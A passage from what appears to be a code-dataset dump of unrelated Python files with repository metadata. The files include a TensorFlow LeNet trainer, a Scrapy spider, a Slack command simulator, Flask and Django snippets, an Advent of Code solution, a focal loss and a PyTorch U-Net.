keep_prob = tf.placeholder(tf.float32)
### Train your model here.
BATCH_SIZE = 256
train=1
rate = 0.00097
print()
print("CNN Structure details ")
##CALL CNN##
logits = LeNet(x)
############
cross_entropy = tf.nn.softmax_cross_entropy_with_logits_v2(logits=logits, labels=one_hot_y)
loss_operation = tf.reduce_mean(cross_entropy)
optimizer = tf.train.AdamOptimizer(learning_rate = rate)
training_operation = optimizer.minimize(loss_operation)
correct_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(one_hot_y, 1))
accuracy_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
saver = tf.train.Saver()
def evaluate(X_data, y_data):
num_examples = len(X_data)
total_accuracy = 0
sess = tf.get_default_session()
for offset in range(0, num_examples, BATCH_SIZE):
batch_x, batch_y = X_data[offset:offset+BATCH_SIZE], y_data[offset:offset+BATCH_SIZE]
accuracy = sess.run(accuracy_operation, feed_dict={x: batch_x, y: batch_y, keep_prob: 1.0})
total_accuracy += (accuracy * len(batch_x))
return total_accuracy / num_examples
# In[15]:
#if train==1:
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
num_examples = len(X_train)
print("Training...")
print()
validation_accuracy_figure = []
test_accuracy_figure = []
for i in range(EPOCHS):
X_train, y_train = shuffle(X_train, y_train)
for offset in range(0, num_examples, BATCH_SIZE):
end = offset + BATCH_SIZE
batch_x, batch_y = X_train[offset:end], y_train[offset:end]
sess.run(training_operation, feed_dict={x: batch_x, y: batch_y, keep_prob: 0.5})
validation_accuracy = evaluate(X_valid, y_valid)
validation_accuracy_figure.append(validation_accuracy)
test_accuracy = evaluate(X_train, y_train)
test_accuracy_figure.append(test_accuracy)
print("EPOCH {} ...".format(i+1))
print("Test Accuracy = {:.3f}".format(test_accuracy))
print("Validation Accuracy = {:.3f}".format(validation_accuracy))
print()
saver.save(sess, './lenet')
print("Model saved")
# In[16]:
plt.plot(test_accuracy_figure)
plt.title("Test Accuracy")
plt.savefig('./images/data/5.png')
plt.clf()
plt.plot(validation_accuracy_figure)
plt.title("Validation Accuracy")
plt.savefig('./images/data/6.png')
plt.clf()
#########################DATABASE##############################
sql = "UPDATE `task` SET value = 1 WHERE slno=1;"
number_of_rows = cursor.execute(sql)
db.commit()
db.close()
#########################End-DATABASE###########################
| [
"anoop.jain10@gmail.com"
] | anoop.jain10@gmail.com |
7ba8883b6f3aaf6ba8363fae014f52cb60c0c1e6 | 5962cf5c30d69b4b57d2ec598e11c3a81c6df083 | /old/bokeh_test.py | da0f6baf6bf94ea0b5d50813736a240e7fb2c59d | [] | no_license | sergeimoiseev/othodi_code | 1584f4006c2bddd8ddbbc6e7439b782c1f93c313 | 87f11374fc1f332752d426af4e047306aefcbd81 | refs/heads/master | 2021-01-10T04:17:45.407696 | 2016-01-26T20:23:59 | 2016-01-26T20:23:59 | 48,580,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | # to run by anaconda
from bokeh.plotting import figure, output_file, show
# output to static HTML file
output_file("line.html")
p = figure(plot_width=400, plot_height=400)
# add a circle renderer with a size, color, and alpha
p.circle([1, 2, 3, 4, 5], [6, 7, 2, 4, 5], size=20, color="navy", alpha=0.5)
# show the results
show(p) | [
"moiseev.sergei@gmail.com"
] | moiseev.sergei@gmail.com |
24e55b3eef2abf192a91eb4a60e24d8054fbe7e2 | 3136d9d701ac77d252e277e5acad470b0ca8deb0 | /Spider/jsonspider/jsonspider/spiders/MySpider.py | 4617a4da54f64c1373365916dc7a2a2f7f30f6d3 | [] | no_license | ahathe/scrapy-project-from-python | 6947f43b97ac37f6749ddc96d42500e038f64a58 | f68890764145badca7e5897353100cf54e8dfa92 | refs/heads/master | 2021-06-23T00:28:16.145088 | 2017-09-05T00:34:30 | 2017-09-05T00:34:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | #!/usr/bin/env python
import scrapy
class MySpider(scrapy.Spider):
name = 'MySpider'
start_urls = [
'http://www.meitulu.com/item/3583.html',
]
def parse(self,response):
for each in response.xpath('//center//img'):
yield {
'jpg':each.xpath('@src').extract()
}
next_page = response.xpath('//center//a/@href').extract()[-1]
if next_page is not None:
yield response.follow(next_page,callback=self.parse)
| [
"1136334598@qq.com"
] | 1136334598@qq.com |
74fd5c72a4cf6b86e44f4ce27f4c5ce2a46d3f83 | b7dd43c7c22b46ea752b9f27556a0bc2785c4db5 | /SnapDragon/PyScripts/_2.py | fce9d9fa954f8392ec239d76045ca313f1f04d52 | [] | no_license | Visin1991/Python_DataAnalysis | ed3a264da2055308d05baa74265d2e8a4880fead | bfeca765df0c2b6c3ad5dd01160c14b56d6cd616 | refs/heads/master | 2020-11-29T07:21:24.029111 | 2019-12-25T12:53:53 | 2019-12-25T12:53:53 | 230,056,438 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 796 | py | import tkinter as tk
from tkinter import ttk
#======================
# Create instance
#======================
win = tk.Tk()
#======================
# Add a title
#======================
win.title("Python GUI")
#=============================================================
# Adding a LabelFrame and a Button
#=============================================================
lFrame = ttk.LabelFrame(win, text="Python GUI Programming Cookbook")
lFrame.grid(column=0, row=0, sticky='WE', padx=10, pady=10)
def clickMe():
from tkinter import messagebox
messagebox.showinfo('Message Box', 'Hi from same Level.')
button = ttk.Button(lFrame, text="Click Me ", command=clickMe)
button.grid(column=1, row=0, sticky=tk.S)
#======================
# Start GUI
#======================
win.mainloop() | [
"zhuzhanhao1991@gmail.com"
] | zhuzhanhao1991@gmail.com |
9775bc6bd071f66fbb05d218a99381b23510f116 | be73248aa4f1171e81b65cf955c4bd6110d56095 | /request_test.py | 353ec800d3b9bd9c0e3797743ad8a33355ced72f | [] | no_license | rogerhoward/lambot | 781c158e58bd71e2f3eb480aab31f181aee55e62 | d5588041fc92b779ba88479d8657f9b8a4916692 | refs/heads/development | 2022-02-18T05:03:23.911978 | 2017-06-22T03:22:11 | 2017-06-22T03:22:11 | 86,493,856 | 1 | 1 | null | 2022-02-04T15:04:55 | 2017-03-28T18:30:43 | Python | UTF-8 | Python | false | false | 2,137 | py | #!/usr/bin/env python
import os
import requests
from pprint import pprint
import click
@click.command()
@click.option('--token', default='gIkuvaNzQIHg97ATvDxqgjtO', help='Slack API token.')
@click.option('--team_id', default='T0001', help='The unique Slack team ID')
@click.option('--team_domain', default='example', help='The unique Slack domain')
@click.option('--channel_id', default='C2147483705', help='The unique ID of the channel where this command originated')
@click.option('--channel_name', default='bot', help='The name of the channel where this command originated')
@click.option('--user_id', default='U2147483697', help='The unique ID of the user who sent this command')
@click.option('--user_name', default='rogerhoward', help='The username of the user who sent this command.')
@click.option('--command', default='/lambot', help='The slash command name')
@click.option('--text', default='calendar', help='All text that followed the slash command - generally options and modifiers')
@click.option('--response_url', default='http://0.0.0.0:5000/test/response', help='The URL where to POST the response(s) - up to five responses may be POSTed to this Webhook')
@click.option('--url', default='http://0.0.0.0:5000/', help='The URL where to POST the initial Slack command payload')
def run(token, team_id, team_domain, channel_id, channel_name, user_id, user_name, command, text, response_url, url ):
"""
Simulates the Slack client by posting a standard Slack payload to the bot endpoint. The URL of the endpoint as well as all values in the payload can be overriden using command line options. The payload format is documented at https://api.slack.com/slash-commands#triggering_a_command
"""
data = {'token': token,
'team_id': team_id,
'team_domain': team_domain,
'channel_id': channel_id,
'channel_name': channel_name,
'user_id': user_id,
'user_name': user_name,
'command': command,
'text': text,
'response_url': response_url}
requests.post(url, data=data)
if __name__ == '__main__':
run()
| [
"rogerhoward@mac.com"
] | rogerhoward@mac.com |
7fd4b8acc7c9c38677a8256d3556db119b6fe7c8 | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/testData/create_tests/create_tst_class.expected_pytest_2k.py | 327ec499b4f492f406f449db0fb397764f8ae8eb | [
"Apache-2.0"
] | permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 111 | py | class Spam(object):
def eggs(self):
assert False
def eggs_and_ham(self):
assert False
| [
"intellij-monorepo-bot-no-reply@jetbrains.com"
] | intellij-monorepo-bot-no-reply@jetbrains.com |
de16d449e03f06649bdd0c13a00277d28cff3652 | 602b908caf567162845b7ac34afc6beb5969b8c9 | /AOC_PY/days/day04.py | 3b399dc67b48357bf9699fc9e7ac494631692542 | [] | no_license | matusmrazik/AdventOfCode2020 | 39cae721d1203f9c59740a2bd132abb534f3f952 | 86d300b9e96ca3a764f1ec7de3f60249f69134d0 | refs/heads/main | 2023-02-05T02:55:37.463297 | 2020-12-28T13:51:35 | 2020-12-28T13:51:35 | 318,509,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,047 | py | import os
import re
INPUT_PATH = os.path.join(os.path.dirname(__file__), '../../Inputs', 'day04.txt')
def validate_field(name: str, value: str):
if name == 'byr':
return re.match(r'^(19[2-9][0-9]|200[0-2])$', value) is not None
elif name == 'iyr':
return re.match(r'^(201[0-9]|2020)$', value) is not None
elif name == 'eyr':
return re.match(r'^(202[0-9]|2030)$', value) is not None
elif name == 'hgt':
return re.match(r'^(1[5-8][0-9]cm|19[0-3]cm|59in|6[0-9]in|7[0-6]in)$', value) is not None
elif name == 'hcl':
return re.match(r'^(#[0-9a-f]{6})$', value) is not None
elif name == 'ecl':
return re.match(r'^(amb|blu|brn|gry|grn|hzl|oth)$', value) is not None
elif name == 'pid':
return re.match(r'^(\d{9})$', value) is not None
return True
class Day04:
def __init__(self):
self.passports = []
with open(INPUT_PATH, 'r') as infile:
lines = infile.read()
for line in lines.split('\n\n'):
self.passports.append(re.split(r'\n| |:', line.strip()))
def solve1(self):
solution = 0
for passport in self.passports:
fields = {'byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid'}
for i in range(0, len(passport), 2):
fields.discard(passport[i])
if len(fields) == 0:
solution += 1
return solution
def solve2(self):
solution = 0
for passport in self.passports:
valid, fields = True, {'byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid'}
for i in range(0, len(passport), 2):
if validate_field(passport[i], passport[i + 1]):
fields.discard(passport[i])
else:
valid = False
break
if valid and len(fields) == 0:
solution += 1
return solution
def main():
x = Day04()
print(x.solve1())
print(x.solve2())
if __name__ == '__main__':
main()
| [
"matus.mrazik2@gmail.com"
] | matus.mrazik2@gmail.com |
c2cd0da87716a6c9fe21cade4cc83fb2007f479d | ebc7607785e8bcd6825df9e8daccd38adc26ba7b | /python/baekjoon/2.algorithm/brute_force/백준_감소하는_수.py | b4b9f0e4b6dd253325d331cce5183803d908e65f | [] | no_license | galid1/Algorithm | 18d1b72b0d5225f99b193e8892d8b513a853d53a | 5bd69e73332f4dd61656ccdecd59c40a2fedb4b2 | refs/heads/master | 2022-02-12T07:38:14.032073 | 2022-02-05T08:34:46 | 2022-02-05T08:34:46 | 179,923,655 | 3 | 0 | null | 2019-06-14T07:18:14 | 2019-04-07T05:49:06 | Python | UTF-8 | Python | false | false | 571 | py | import sys
def dfs(cur_num, limit):
global answer, idx, n, answers
# 재귀 종료
if len(cur_num) == limit:
idx += 1
answers.append(cur_num)
# 정답이 존재
if idx == n:
print(cur_num)
sys.exit()
return
if not cur_num:
for i in range(10):
dfs(str(i), limit)
else:
for j in range(int(cur_num[-1])):
dfs(cur_num + str(j), limit)
answer, idx = 0, -1
answers = []
n = int(sys.stdin.readline())
for i in range(1, 11):
dfs('', i)
print(-1) | [
"galid1@naver.com"
] | galid1@naver.com |
2f06ed76fa47c4244dbaeecb75147c3f68f79bde | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/29/usersdata/67/9081/submittedfiles/atividade.py | a1a123328be3fb4dd0cf7fd77b88a631cf61ee74 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 213 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
n=int(input("Digite o valor de n:"))
contador=0
i=1
while (i<=n):
if n//10=!0:
contador=contador+1
i=i+1
print(contador) | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
0f2f7ee10782ae1ea20dac49abf367a2909b2920 | 7578f8752ea9693c9b2bcca1b4f4bddb74ea4c4b | /projector/projections.py | bb0223ddd257c754cf518486cd794b58e3a14024 | [
"MIT"
] | permissive | SixiemeEtage/projector | 5ade66f8932c5905619518b6df4cf6fc460bd040 | 6d6b2488322556b1cd71eafc7d784787aca331bd | refs/heads/master | 2021-01-19T08:48:41.375749 | 2019-03-17T13:52:06 | 2019-03-17T14:06:54 | 81,648,850 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 906 | py | import libprojector
PROJECTION_EQUIRECTANGULAR = 'equirectangular'
PROJECTION_CUBEMAP = 'cubemap'
class BaseProj(object):
def __init__(self, image_width, options):
self.image_width = image_width
self.options = options
def get_projection(self):
raise NotImplementedError
class EquirectangularProj(BaseProj):
def get_projection(self):
width = int(self.image_width)
height = int(self.image_width / 2)
return libprojector.SphericalProjection(width, height)
class CubemapProj(BaseProj):
def get_projection(self):
side_width = int(self.image_width / 6)
border_padding = self.options.get('border_padding', 0)
return libprojector.CubemapProjection(side_width, border_padding)
PROJECTION_CLASSES = dict((
(PROJECTION_EQUIRECTANGULAR, EquirectangularProj),
(PROJECTION_CUBEMAP, CubemapProj),
))
| [
"dulacpier@gmail.com"
] | dulacpier@gmail.com |
60ca98b589589149ef509f9d010525f46acc8ff8 | 5e773def7273c9a082392e1980548114f15e5675 | /Focalloss.py | 25477a475cb72f608dd02c1090ebf41268cefe59 | [] | no_license | lihuaqiang0101/Hourglass | 77ebbf9faef506492a1949f20766b4c1dce3bc18 | 32fc92b0d2e889999c4a58eb26726b1f065f85c8 | refs/heads/master | 2022-10-01T11:47:02.885662 | 2020-06-05T08:41:41 | 2020-06-05T08:41:41 | 269,575,253 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 782 | py | from torch import nn
import torch.nn.functional as F
import torch
class FocalLoss(nn.Module):
def __init__(self, alpha=1, gamma=2, logits=False, reduce=True):
super(FocalLoss, self).__init__()
self.alpha = alpha
self.gamma = gamma
self.logits = logits
self.reduce = reduce
def forward(self, inputs, targets):
if self.logits:
BCE_loss = F.binary_cross_entropy_with_logits(inputs, targets, reduce=False)
else:
BCE_loss = F.binary_cross_entropy(inputs, targets, reduce=False)
pt = torch.exp(-BCE_loss)
F_loss = self.alpha * (1-pt)**self.gamma * BCE_loss
if self.reduce:
return torch.mean(F_loss)
else:
return F_loss | [
"noreply@github.com"
] | lihuaqiang0101.noreply@github.com |
042e915a0a2df5f868aa3256ebaf6bbfe36e22db | 3193bf23c578bbb5373e574fb61e3cd8df1fcd37 | /app/main/forms.py | c319d6fe64458b1f16f2665f2cd1a6fc6f550ef4 | [] | no_license | chouhui/Flasky | 73ceefbe4424428abba895944322efa13604e632 | c524fe68a5ced729d3fb6d8e929d30d6d6a32c28 | refs/heads/master | 2021-09-09T05:51:57.770748 | 2018-03-14T02:29:30 | 2018-03-14T02:29:30 | 125,138,451 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,259 | py | from flask_wtf import FlaskForm, Form
from wtforms import StringField, SubmitField, TextAreaField, BooleanField, SelectField, ValidationError
from wtforms.validators import DataRequired, Length, Email, Required, Regexp
from flask_pagedown.fields import PageDownField
from ..models import Role, User
class NameForm(FlaskForm):
name = StringField('What is your name?', validators=[DataRequired()])
submit = SubmitField('Submit')
class EditProfileForm(FlaskForm):
name = StringField('Real name', validators=[Length(0, 64)])
location = StringField('Location', validators=[Length(0, 64)])
about_me = TextAreaField('About me')
submit = SubmitField('Submit')
class EditProfileAdminForm(FlaskForm):
email = StringField('Email', validators=[Required(), Length(1, 64), Email()])
username = StringField('Username', validators=[Required(), Length(1, 64), Regexp('^[A-Za-z][A-Za-z0-9_.]*$', 0,
'Usernames must have only letters, '
'numbers, dots or underscores')])
confirmed = BooleanField('Confirmed')
role = SelectField('Role', coerce=int)
name = StringField('Real name', validators=[Length(0, 64)])
location = StringField('Location', validators=[Length(0, 64)])
about_me = TextAreaField('About me')
submit = SubmitField('Submit')
def __init__(self, user, *args, **kwargs):
super(EditProfileAdminForm, self).__init__(*args, **kwargs)
self.role.choices = [(role.id, role.name)
for role in Role.query.order_by(Role.name).all()]
self.user = user
def validate_email(self, field):
if field.data != self.user.eamil and User.query.filter_by(email=field.data).first():
raise ValidationError('Email already registered.')
def validate_username(self, field):
if field.data != self.user.username and User.query.filter_by(username=field.data).first():
raise ValidationError('Username already in user.')
class PostForm(FlaskForm):
body = PageDownField("What's on your mind?", validators=[DataRequired()])
submit = SubmitField('Submit')
| [
"zhidao666@gmail.com"
] | zhidao666@gmail.com |
82d5f0dee74684e1f7e9113adbdd737d287c5172 | 7b591fa0aa65721bca1761be28959cfb88f1c7ab | /src/AnewSentimentAnalysis.py | 68426fbef4337fd863869c65e3495595b76d87f5 | [] | no_license | hengee/SentimentAnalysis | a455540bc50393f444814dcb97186c3025ab9449 | d8323e89993ff78433c02f5b4b71f3776e948fba | refs/heads/master | 2020-06-24T11:27:18.672074 | 2017-11-10T20:28:43 | 2017-11-10T20:28:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,360 | py | """
Author: Doris Zhou
Date: September 29, 2017
Performs sentiment analysis on a text file using ANEW.
Parameters:
--dir [path of directory]
specifies directory of files to analyze
--file [path of text file]
specifies location of specific file to analyze
--out [path of directory]
specifies directory to create output files
--mode [mode]
takes either "median" or "mean"; determines which is used to calculate sentence sentiment values
"""
# add parameter to exclude duplicates? also mean or median analysis
import csv
import sys
import os
import statistics
import time
import argparse
from stanfordcorenlp import StanfordCoreNLP
nlp = StanfordCoreNLP('C:/Users/Doris/software tools/stanford-corenlp-full-2016-10-31')
from nltk import tokenize
from nltk.corpus import stopwords
stops = set(stopwords.words("english"))
anew = "../lib/EnglishShortened.csv"
# performs sentiment analysis on inputFile using the ANEW database, outputting results to a new CSV file in outputDir
def analyzefile(input_file, output_dir, mode):
"""
Performs sentiment analysis on the text file given as input using the ANEW database.
Outputs results to a new CSV file in output_dir.
:param input_file: path of .txt file to analyze
:param output_dir: path of directory to create new output file
:param mode: determines how sentiment values for a sentence are computed (median or mean)
:return:
"""
output_file = os.path.join(output_dir, "Output Anew Sentiment " + os.path.basename(input_file).rstrip('.txt') + ".csv")
# read file into string
with open(input_file, 'r') as myfile:
fulltext = myfile.read()
# end method if file is empty
if len(fulltext) < 1:
print('Empty file.')
return
from nltk.stem.wordnet import WordNetLemmatizer
lmtzr = WordNetLemmatizer()
# otherwise, split into sentences
sentences = tokenize.sent_tokenize(fulltext)
i = 1 # to store sentence index
# check each word in sentence for sentiment and write to output_file
with open(output_file, 'w', newline='') as csvfile:
fieldnames = ['Sentence ID', 'Sentence', 'Sentiment', 'Sentiment Label', 'Arousal', 'Dominance',
'# Words Found', 'Found Words', 'All Words']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
# analyze each sentence for sentiment
for s in sentences:
# print("S" + str(i) +": " + s)
all_words = []
found_words = []
total_words = 0
v_list = [] # holds valence scores
a_list = [] # holds arousal scores
d_list = [] # holds dominance scores
# search for each valid word's sentiment in ANEW
words = nlp.pos_tag(s.lower())
for index, p in enumerate(words):
# don't process stops or words w/ punctuation
w = p[0]
pos = p[1]
if w in stops or not w.isalpha():
continue
# check for negation in 3 words before current word
j = index-1
neg = False
while j >= 0 and j >= index-3:
if words[j][0] == 'not' or words[j][0] == 'no' or words[j][0] == 'n\'t':
neg = True
break
j -= 1
# lemmatize word based on pos
if pos[0] == 'N' or pos[0] == 'V':
lemma = lmtzr.lemmatize(w, pos=pos[0].lower())
else:
lemma = w
all_words.append(lemma)
# search for lemmatized word in ANEW
with open(anew) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
if row['Word'].casefold() == lemma.casefold():
if neg:
found_words.append("neg-"+lemma)
else:
found_words.append(lemma)
v = float(row['valence'])
a = float(row['arousal'])
d = float(row['dominance'])
if neg:
# reverse polarity for this word
v = 5 - (v - 5)
a = 5 - (a - 5)
d = 5 - (d - 5)
v_list.append(v)
a_list.append(a)
d_list.append(d)
if len(found_words) == 0: # no words found in ANEW for this sentence
writer.writerow({'Sentence ID': i,
'Sentence': s,
'Sentiment': 'N/A',
'Sentiment Label': 'N/A',
'Arousal': 'N/A',
'Dominance': 'N/A',
'# Words Found': 0,
'Found Words': 'N/A',
'All Words': all_words
})
i += 1
else: # output sentiment info for this sentence
# get values
if mode == 'median':
sentiment = statistics.median(v_list)
arousal = statistics.median(a_list)
dominance = statistics.median(d_list)
else:
sentiment = statistics.mean(v_list)
arousal = statistics.mean(a_list)
dominance = statistics.mean(d_list)
# set sentiment label
label = 'neutral'
if sentiment > 6:
label = 'positive'
elif sentiment < 4:
label = 'negative'
writer.writerow({'Sentence ID': i,
'Sentence': s,
'Sentiment': sentiment,
'Sentiment Label': label,
'Arousal': arousal,
'Dominance': dominance,
'# Words Found': ("%d out of %d" % (len(found_words), len(all_words))),
'Found Words': found_words,
'All Words': all_words
})
i += 1
def main(input_file, input_dir, output_dir, mode):
"""
Runs analyzefile on the appropriate files, provided that the input paths are valid.
:param input_file:
:param input_dir:
:param output_dir:
:param mode:
:return:
"""
if len(output_dir) < 0 or not os.path.exists(output_dir): # empty output
print('No output directory specified, or path does not exist')
sys.exit(0)
elif len(input_file) == 0 and len(input_dir) == 0: # empty input
print('No input specified. Please give either a single file or a directory of files to analyze.')
sys.exit(1)
elif len(input_file) > 0: # handle single file
if os.path.exists(input_file):
analyzefile(input_file, output_dir, mode)
else:
print('Input file "' + input_file + '" is invalid.')
sys.exit(0)
elif len(input_dir) > 0: # handle directory
if os.path.isdir(input_dir):
directory = os.fsencode(input_dir)
for file in os.listdir(directory):
filename = os.path.join(input_dir, os.fsdecode(file))
if filename.endswith(".txt"):
start_time = time.time()
print("Starting sentiment analysis of " + filename + "...")
analyzefile(filename, output_dir, mode)
print("Finished analyzing " + filename + " in " + str((time.time() - start_time)) + " seconds")
else:
print('Input directory "' + input_dir + '" is invalid.')
sys.exit(0)
if __name__ == '__main__':
# get arguments from command line
parser = argparse.ArgumentParser(description='Sentiment analysis with ANEW.')
parser.add_argument('--file', type=str, dest='input_file', default='',
help='a string to hold the path of one file to process')
parser.add_argument('--dir', type=str, dest='input_dir', default='',
help='a string to hold the path of a directory of files to process')
parser.add_argument('--out', type=str, dest='output_dir', default='',
help='a string to hold the path of the output directory')
parser.add_argument('--mode', type=str, dest='mode', default='mean',
help='mode with which to calculate sentiment in the sentence: mean or median')
args = parser.parse_args()
# run main
sys.exit(main(args.input_file, args.input_dir, args.output_dir, args.mode))
| [
"noreply@github.com"
] | hengee.noreply@github.com |
bf28bb9d66663bbea2f265248247d8092ce07621 | 1575df2b884ec1a5155ae7f2f8198ca7b9e0ca4a | /client.py | b15847e738c93eb1ee2dbb45292b276614618dfe | [] | no_license | hues-platform/energy-hub-server | cefaea24bea70a3bc0d668ebcad4c5076a2ec950 | ae278a9bf121b566b492719056f8c56f5beb2127 | refs/heads/master | 2021-01-01T18:20:41.779170 | 2017-07-25T21:33:21 | 2017-07-25T21:33:21 | 98,314,028 | 1 | 0 | null | 2017-07-25T21:33:22 | 2017-07-25T14:15:25 | null | UTF-8 | Python | false | false | 1,034 | py | """
An example of remotely solving a EHub Model.
"""
import json
import xmlrpc.client
import excel_to_request_format
# pylint: disable=all
def main():
# We are reading from a excel file as an example
file = 'excel_files/General_input_new_simple.xlsx'
# Now we convert the excel file into the request format
request = excel_to_request_format.convert(file)
# And then convert the Python dictionary into a JSON object, which is stored
# as a Python str
request = json.dumps(request)
url = 'http://localhost:8080' # The URL of the server
# Connect to the server
with xmlrpc.client.ServerProxy(url) as server:
# The `server` variable is used to make calls to the XMLRPC server.
# Here, we call the `solve` method on the server. This method solves our
# model, which is stored in the `contents` variable.
results = server.solve(request)
# Now we can manipulate the results ourselves
print(json.loads(results))
if __name__ == '__main__':
main()
| [
"infogreytech@gmail.com"
] | infogreytech@gmail.com |
46cef7c62e51c1e77f3265fa82b86b6fd7bffc6e | da30c8804c123a0ab862ac89d5fd342caa4079d9 | /venv/lib/python3.6/rlcompleter.py | 197205cae89ce4a3abc8dfff6ce7fe245cd35951 | [] | no_license | wvs2/observatorio | 0ebc9dfa1037c028cdcc5232ff07fc437358031d | de14cd04678587bba0cefce2d6335826a626d6f6 | refs/heads/master | 2020-05-02T15:39:06.656098 | 2019-04-11T23:49:02 | 2019-04-11T23:49:02 | 178,048,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 55 | py | /home/woshington/anaconda3/lib/python3.6/rlcompleter.py | [
"wvs2@cin.ufpe.br"
] | wvs2@cin.ufpe.br |
da12dffb6fec332184681c73c6578637a6f5cb99 | 0726de522b858dbbdbac86c976a0719855ed67e2 | /api/urls.py | 8c90ce7c770957c4651d426ef4842a85c2b70107 | [
"MIT"
] | permissive | gen1us2k/django-example | 5cf47e7edec573685fa4a611acb9a3c497483498 | 6bde1bb492cd6951e8d1b633d236448a0f485e84 | refs/heads/master | 2021-01-01T05:12:34.720093 | 2016-05-22T14:37:29 | 2016-05-22T14:37:29 | 59,410,183 | 8 | 3 | null | null | null | null | UTF-8 | Python | false | false | 404 | py | # -*- coding: utf-8 -*-
from django.conf.urls import patterns, url, include
from rest_framework.routers import DefaultRouter
from . import views
router = DefaultRouter()
router.register('executors', views.ExecutorViewSet, 'executors')
router.register('customers', views.CustomerViewSet, 'customers')
router.register('tasks', views.TaskViewSet)
urlpatterns = [
url('^v1/', include(router.urls)),
]
| [
"minkin.andrew@gmail.com"
] | minkin.andrew@gmail.com |
cfd9b2138270784a7756ffc25d5909dc0473608d | a0b6b96f6324532625e64ceee0ae83920c0974c5 | /models/unet.py | 46c71144c9a425159851292ec1d31cdf68374102 | [
"MIT"
] | permissive | bbrangeo/pytorch-image-segmentation | 5ebf07055ff1216218b7ef5d4db4f769eb266b21 | 036236372bd85f48bfe33c6a89d7006fab800387 | refs/heads/master | 2020-08-17T01:00:38.061447 | 2019-03-12T15:49:49 | 2019-03-12T15:49:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,423 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
import warnings
warnings.filterwarnings("ignore")
class Ublock(torch.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, padding=1):
super().__init__()
self.net = torch.nn.Sequential(
nn.Conv2d(in_channels, out_channels, kernel_size,padding=padding),
#nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True),
nn.Conv2d(out_channels, out_channels, kernel_size,padding=padding),
#nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True)
)
def forward(self, x):
return self.net(x)
class UpSamplingPadding(torch.nn.Module):
def __init__(self, in_channels, out_channels, bilinear=True):
super(UpSamplingPadding, self).__init__()
self.up = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True)
self.in_channels = in_channels
self.out_channels = out_channels
self.ublock = Ublock(in_channels=self.in_channels, out_channels=self.out_channels)
def forward(self, x1, x2):
x1 = self.up(x1)
# input is CHW
diffY = x2.size()[2] - x1.size()[2]
diffX = x2.size()[3] - x1.size()[3]
x1 = F.pad(x1, (diffX // 2, diffX - diffX//2,
diffY // 2, diffY - diffY//2))
# for padding issues, see
# https://github.com/HaiyongJiang/U-Net-Pytorch-Unstructured-Buggy/commit/0e854509c2cea854e247a9c615f175f76fbb2e3a
# https://github.com/xiaopeng-liao/Pytorch-UNet/commit/8ebac70e633bac59fc22bb5195e513d5832fb3bd
x = torch.cat([x2, x1], dim=1)
x = self.ublock(x)
return x
class Unet(nn.Module):
def __init__(self, input_channels=3,input_width=480, input_height=360, n_classes=10):
super(Unet,self).__init__()
self.input_channels = input_channels
self.input_width = input_width
self.input_height = input_height
self.n_classes = n_classes
self.conv1 = Ublock(input_channels, 64, kernel_size=3)
self.pool2 = torch.nn.MaxPool2d(kernel_size=2)
self.conv2 = Ublock(64, 128, kernel_size=3)
self.pool3 = torch.nn.MaxPool2d(kernel_size=2)
self.conv3 = Ublock(128, 256, kernel_size=3)
self.pool4 = torch.nn.MaxPool2d(kernel_size=2)
self.conv4 = Ublock(256, 512, kernel_size=3)
self.pool5 = torch.nn.MaxPool2d(kernel_size=2)
self.conv5 = Ublock(512, 512, kernel_size=3)
self.up1 = UpSamplingPadding(512 + 512, 256)
self.up2 = UpSamplingPadding(256 + 256, 128)
self.up3 = UpSamplingPadding(128 + 128, 64)
self.up4 = UpSamplingPadding(128, 64)
self.outputconv = torch.nn.Conv2d(64, self.n_classes, kernel_size=1)
def forward(self,x):
# Downsampling phase
conv1 = self.conv1(x)
pool2 = self.pool2(conv1)
conv2 = self.conv2(pool2)
pool3 = self.pool3(conv2)
conv3 = self.conv3(pool3)
pool4 = self.pool4(conv3)
conv4 = self.conv4(pool4)
pool5 = self.pool5(conv4)
conv5 = self.conv5(pool5)
# Upsampling phase
up1 = self.up1(conv5,conv4)
up2 = self.up2(up1,conv3)
up3 = self.up3(up2,conv2)
up4 = self.up4(up3,conv1)
return F.sigmoid(self.outputconv(up4))
if __name__ == "__main__":
import numpy as np
batch_size = 1
n_channels = 3
input_width = 480
input_height = 360
n_classes = 10
